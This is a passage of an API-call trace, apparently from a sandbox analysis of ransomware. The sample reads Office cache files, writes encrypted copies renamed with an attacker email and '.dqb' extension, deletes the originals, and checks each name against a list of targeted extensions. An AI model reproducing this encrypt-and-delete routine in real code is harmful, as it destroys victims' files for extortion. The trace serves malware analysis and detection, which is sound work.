liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.851] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.851] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.851] GetLastError () returned 0x0 [0035.851] ReadFile (in: hFile=0x1a0, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x545, lpOverlapped=0x0) returned 1 [0035.914] WriteFile (in: hFile=0x170, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x550, lpOverlapped=0x0) returned 1 [0035.915] ReadFile (in: hFile=0x1a0, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.915] WriteFile (in: hFile=0x170, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xee, lpOverlapped=0x0) returned 1 [0035.915] SetEndOfFile (hFile=0x170) returned 1 [0035.915] CloseHandle (hObject=0x170) returned 1 [0035.915] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.915] SetEndOfFile (hFile=0x1a0) returned 1 [0035.916] CloseHandle (hObject=0x1a0) returned 1 [0035.916] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0035.916] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml")) returned 1 [0035.917] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.917] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.917] lstrlenW (lpString=".doc") returned 4 [0035.917] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.917] lstrlenW (lpString=".docx") returned 5 [0035.917] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.917] lstrlenW (lpString=".pdf") returned 4 [0035.917] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.917] lstrlenW (lpString=".xls") returned 4 [0035.917] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.917] lstrlenW (lpString=".xlsx") returned 5 [0035.917] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.917] lstrlenW (lpString=".ppt") returned 4 [0035.917] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.917] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.917] lstrlenW (lpString=".zip") returned 4 [0035.917] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.917] lstrlenW (lpString=".rar") returned 4 [0035.917] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.917] lstrlenW (lpString=".bz2") returned 4 [0035.917] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.917] lstrlenW (lpString=".7z") returned 3 [0035.917] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.917] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.917] lstrlenW (lpString=".dbf") returned 4 [0035.917] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.917] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.917] lstrlenW (lpString=".1cd") returned 4 [0035.917] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.917] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.917] lstrlenW (lpString=".jpg") returned 4 [0035.917] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.918] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.918] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.918] lstrlenW (lpString=".doc") returned 4 [0035.918] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.918] lstrlenW (lpString=".docx") returned 5 [0035.918] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.918] lstrlenW (lpString=".pdf") returned 4 [0035.918] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.918] lstrlenW (lpString=".xls") returned 4 [0035.918] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.918] lstrlenW (lpString=".xlsx") returned 5 [0035.918] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.918] lstrlenW (lpString=".ppt") returned 4 [0035.918] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.918] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.918] lstrlenW (lpString=".zip") returned 4 [0035.918] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.918] lstrlenW (lpString=".rar") returned 4 [0035.918] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.918] lstrlenW (lpString=".bz2") returned 4 [0035.918] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.918] lstrlenW (lpString=".7z") returned 3 [0035.918] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.918] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.918] lstrlenW (lpString=".dbf") returned 4 [0035.918] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.918] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.918] lstrlenW (lpString=".1cd") returned 4 [0035.918] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.918] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.918] lstrlenW (lpString=".jpg") returned 4 [0035.918] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.919] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0035.919] lstrlenW (lpString="Office32WW.xml") returned 14 [0035.919] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.920] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=4274) returned 1 [0035.920] CloseHandle (hObject=0x1a0) returned 1 [0035.920] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 0x2020 [0035.920] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0035.920] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.920] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.920] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.920] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.920] GetLastError () returned 0x0 [0035.920] ReadFile (in: hFile=0x1a0, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x10b2, lpOverlapped=0x0) returned 1 [0035.922] WriteFile (in: hFile=0x170, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x10c0, lpOverlapped=0x0) returned 1 [0035.923] ReadFile (in: hFile=0x1a0, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.923] WriteFile (in: hFile=0x170, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0035.923] SetEndOfFile (hFile=0x170) returned 1 [0035.923] CloseHandle (hObject=0x170) returned 1 [0035.923] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.923] SetEndOfFile (hFile=0x1a0) returned 1 [0035.924] CloseHandle (hObject=0x1a0) returned 1 [0035.924] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0035.925] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1 [0035.925] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.925] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.925] lstrlenW (lpString=".doc") returned 4 [0035.925] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.925] lstrlenW (lpString=".docx") returned 5 [0035.925] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0035.925] lstrlenW (lpString=".pdf") returned 4 [0035.925] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.925] lstrlenW (lpString=".xls") returned 4 [0035.925] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.925] lstrlenW (lpString=".xlsx") returned 5 [0035.925] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0035.925] lstrlenW (lpString=".ppt") returned 4 [0035.925] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.925] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.925] lstrlenW (lpString=".zip") returned 4 [0035.925] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.925] lstrlenW (lpString=".rar") returned 4 [0035.925] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.925] lstrlenW (lpString=".bz2") returned 4 [0035.925] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.925] lstrlenW (lpString=".7z") returned 3 [0035.925] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.925] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.925] lstrlenW (lpString=".dbf") returned 4 [0035.925] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.926] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.926] lstrlenW (lpString=".1cd") returned 4 [0035.926] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.926] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.926] lstrlenW (lpString=".jpg") returned 4 [0035.926] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.926] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.926] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.926] lstrlenW (lpString=".doc") returned 4 [0035.926] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.926] lstrlenW (lpString=".docx") returned 5 [0035.926] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0035.926] lstrlenW (lpString=".pdf") returned 4 [0035.926] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.926] lstrlenW (lpString=".xls") returned 4 [0035.926] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.926] lstrlenW (lpString=".xlsx") returned 5 [0035.926] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0035.926] lstrlenW (lpString=".ppt") returned 4 [0035.926] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.926] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.926] lstrlenW (lpString=".zip") returned 4 [0035.926] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.926] lstrlenW (lpString=".rar") returned 4 [0035.926] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.926] lstrlenW (lpString=".bz2") returned 4 [0035.926] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.926] lstrlenW (lpString=".7z") returned 3 [0035.926] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.926] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.926] lstrlenW (lpString=".dbf") returned 4 [0035.926] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.926] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.926] lstrlenW (lpString=".1cd") returned 4 [0035.926] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.927] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.927] lstrlenW (lpString=".jpg") returned 4 [0035.927] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.927] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0035.927] lstrlenW (lpString="PrjProrWW.xml") returned 13 [0035.927] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.928] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=6421) returned 1 [0035.928] CloseHandle (hObject=0x1a0) returned 1 [0035.928] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml")) returned 0x2020 [0035.928] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0035.928] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.928] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.928] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.928] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.928] GetLastError () returned 0x0 [0035.929] ReadFile (in: hFile=0x1a0, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x1915, lpOverlapped=0x0) returned 1 [0035.930] WriteFile (in: hFile=0x170, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x1920, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x1920, lpOverlapped=0x0) returned 1 [0035.931] ReadFile (in: hFile=0x1a0, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.931] WriteFile (in: hFile=0x170, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xee, lpOverlapped=0x0) returned 1 [0035.931] SetEndOfFile (hFile=0x170) returned 1 [0035.931] CloseHandle (hObject=0x170) returned 1 [0035.932] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.932] SetEndOfFile (hFile=0x1a0) returned 1 [0035.932] CloseHandle (hObject=0x1a0) returned 1 [0035.933] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0035.933] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml")) returned 1 [0035.933] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.933] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.933] lstrlenW (lpString=".doc") returned 4 [0035.933] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.933] lstrlenW (lpString=".docx") returned 5 [0035.933] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0035.933] lstrlenW (lpString=".pdf") returned 4 [0035.933] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.933] lstrlenW (lpString=".xls") returned 4 [0035.933] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.933] lstrlenW (lpString=".xlsx") returned 5 [0035.933] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0035.933] lstrlenW (lpString=".ppt") returned 4 [0035.933] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.933] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.933] lstrlenW (lpString=".zip") returned 4 [0035.933] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.933] lstrlenW (lpString=".rar") returned 4 [0035.933] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.933] lstrlenW (lpString=".bz2") returned 4 [0035.933] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.934] lstrlenW (lpString=".7z") returned 3 [0035.934] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.934] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.934] lstrlenW (lpString=".dbf") returned 4 [0035.934] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.934] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.934] lstrlenW (lpString=".1cd") returned 4 [0035.934] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.934] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.934] lstrlenW (lpString=".jpg") returned 4 [0035.934] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.934] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.934] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.934] lstrlenW (lpString=".doc") returned 4 [0035.934] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.934] lstrlenW (lpString=".docx") returned 5 [0035.934] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0035.934] lstrlenW (lpString=".pdf") returned 4 [0035.934] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.934] lstrlenW (lpString=".xls") returned 4 [0035.934] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.934] lstrlenW (lpString=".xlsx") returned 5 [0035.934] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0035.934] lstrlenW (lpString=".ppt") returned 4 [0035.935] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.935] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.935] lstrlenW (lpString=".zip") returned 4 [0035.935] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.935] lstrlenW (lpString=".rar") returned 4 [0035.935] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.935] lstrlenW (lpString=".bz2") returned 4 [0035.935] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.935] lstrlenW (lpString=".7z") returned 3 [0035.935] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.935] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.935] lstrlenW (lpString=".dbf") returned 4 [0035.935] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.935] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.935] lstrlenW (lpString=".1cd") returned 4 [0035.935] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.935] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.935] lstrlenW (lpString=".jpg") returned 4 [0035.935] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.935] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0035.935] lstrlenW (lpString="Setup.xml") returned 9 [0035.935] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.936] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=16683) returned 1 [0035.936] CloseHandle (hObject=0x1a0) returned 1 [0035.936] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.936] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all 